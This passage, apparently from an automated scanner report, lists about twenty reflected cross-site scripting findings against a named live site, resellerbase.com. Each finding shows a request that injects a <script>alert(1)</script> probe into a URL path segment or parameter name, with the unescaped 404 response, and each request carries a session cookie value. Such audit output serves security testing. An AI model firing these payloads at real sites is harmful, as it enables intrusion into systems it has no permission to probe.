Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/?2b3c8<script>alert(1)</script>007c239e86d=1 was not found on this server.</p>
...[SNIP]...

2.3581. http://www.resellerbase.com/detail/7/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload acbc2<script>alert(1)</script>99d3f17ecb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailacbc2<script>alert(1)</script>99d3f17ecb8/7/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailacbc2<script>alert(1)</script>99d3f17ecb8/7/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3582. http://www.resellerbase.com/detail/7/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 780c8<script>alert(1)</script>bd4fcf8846d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7780c8<script>alert(1)</script>bd4fcf8846d/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7780c8<script>alert(1)</script>bd4fcf8846d/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3583. http://www.resellerbase.com/detail/7/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 87a21<script>alert(1)</script>018a6395970 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes87a21<script>alert(1)</script>018a6395970/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes87a21<script>alert(1)</script>018a6395970/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3584. http://www.resellerbase.com/detail/7/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 37798<script>alert(1)</script>4f995f85268 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos37798<script>alert(1)</script>4f995f85268/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos37798<script>alert(1)</script>4f995f85268/images/ was not found on this server.</p>
...[SNIP]...

2.3585. http://www.resellerbase.com/detail/7/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4fa30<script>alert(1)</script>ec7de2d5346 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images4fa30<script>alert(1)</script>ec7de2d5346/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images4fa30<script>alert(1)</script>ec7de2d5346/ was not found on this server.</p>
...[SNIP]...

2.3586. http://www.resellerbase.com/detail/7/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 97fb8<script>alert(1)</script>4f0efd6cfd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/?97fb8<script>alert(1)</script>4f0efd6cfd6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/?97fb8<script>alert(1)</script>4f0efd6cfd6=1 was not found on this server.</p>
...[SNIP]...

2.3587. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d8f70<script>alert(1)</script>45631db7b5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild8f70<script>alert(1)</script>45631db7b5e/7/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild8f70<script>alert(1)</script>45631db7b5e/7/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3588. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 85ad6<script>alert(1)</script>0fece11e306 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/785ad6<script>alert(1)</script>0fece11e306/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/785ad6<script>alert(1)</script>0fece11e306/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3589. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 89889<script>alert(1)</script>c63b036d845 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes89889<script>alert(1)</script>c63b036d845/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes89889<script>alert(1)</script>c63b036d845/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3590. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fb559<script>alert(1)</script>115b85c28d1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmosfb559<script>alert(1)</script>115b85c28d1/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmosfb559<script>alert(1)</script>115b85c28d1/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3591. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fa07c<script>alert(1)</script>a543b0e9065 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/imagesfa07c<script>alert(1)</script>a543b0e9065/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/imagesfa07c<script>alert(1)</script>a543b0e9065/rating/ was not found on this server.</p>
...[SNIP]...

2.3592. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6b775<script>alert(1)</script>7610d876f51 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/rating6b775<script>alert(1)</script>7610d876f51/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating6b775<script>alert(1)</script>7610d876f51/ was not found on this server.</p>
...[SNIP]...

2.3593. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3943f<script>alert(1)</script>12a5bcbd370 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/rating/?3943f<script>alert(1)</script>12a5bcbd370=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/?3943f<script>alert(1)</script>12a5bcbd370=1 was not found on this server.</p>
...[SNIP]...

2.3594. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21c19<script>alert(1)</script>162f0f9c13b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail21c19<script>alert(1)</script>162f0f9c13b/7/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail21c19<script>alert(1)</script>162f0f9c13b/7/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3595. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 727e6<script>alert(1)</script>70267e48f2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7727e6<script>alert(1)</script>70267e48f2c/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7727e6<script>alert(1)</script>70267e48f2c/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3596. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b2ef6<script>alert(1)</script>df53e795b3d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themesb2ef6<script>alert(1)</script>df53e795b3d/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themesb2ef6<script>alert(1)</script>df53e795b3d/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3597. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e6d90<script>alert(1)</script>87186e0267d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmose6d90<script>alert(1)</script>87186e0267d/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmose6d90<script>alert(1)</script>87186e0267d/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3598. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7462<script>alert(1)</script>46fcdcf0b72 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/imagesf7462<script>alert(1)</script>46fcdcf0b72/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/imagesf7462<script>alert(1)</script>46fcdcf0b72/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3599. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 29901<script>alert(1)</script>eb4caa46598 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/rating29901<script>alert(1)</script>eb4caa46598/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating29901<script>alert(1)</script>eb4caa46598/4half.gif was not found on this server.</p>
...[SNIP]...

2.3600. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [REST URL parameter 7] previous next

